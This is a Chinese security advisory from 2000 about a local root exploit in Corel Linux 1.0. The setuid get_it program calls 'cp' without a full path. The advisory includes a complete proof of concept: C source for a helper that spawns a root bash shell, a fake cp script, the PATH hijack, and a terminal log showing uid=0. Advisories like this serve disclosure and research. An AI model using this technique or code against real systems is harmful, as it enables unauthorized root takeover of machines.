Corel Linux get_it 路径漏洞
发布日期:2000-01-12
更新日期:2000-01-13
受影响系统:Corel Linux OS 1.0
描述:
随Corel's Linux OS发布的"Corel Update" 的一个组件程序存在本地路径漏洞。保存在/usr/X11R6/bin中的二进制文件"get_it"缺省安装时是一个setuid root文件(它是.deb包安装/升级程序的一部分)。get_it在它调用'cp'时(没有使用全路径)依赖路径来确定有效性,这就造成了通过改变第一搜索路径可以让一个任意的程序(调用'cp')来继承root权限。其后果是可以获得本地root权限。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
by Cesar Tascon Alvarez <tascon@gui.uva.es> regarding this issue:
CorelLinux:~$ id
uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~$ cat misu.c
#include <stdio.h>
#include <unistd.h>
main(argc,argv)
int argc;
char **argv;
{
if (argc==2);
setuid(atoi(argv[1]));
execlp("/bin/bash","/bin/bash",NULL);
}
CorelLinux:~$ cc -o misu misu.c
CorelLinux:~$ pwd
/home/tascon
CorelLinux:~$ cat cp
echo $1 $2 $3
/home/tascon/misu 0
CorelLinux:~$ export PATH=.:$PATH
CorelLinux:~$ get_it
/usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~# exit
exit
/usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
建议:
暂无
浏览次数:6703
严重程度:0(网友投票)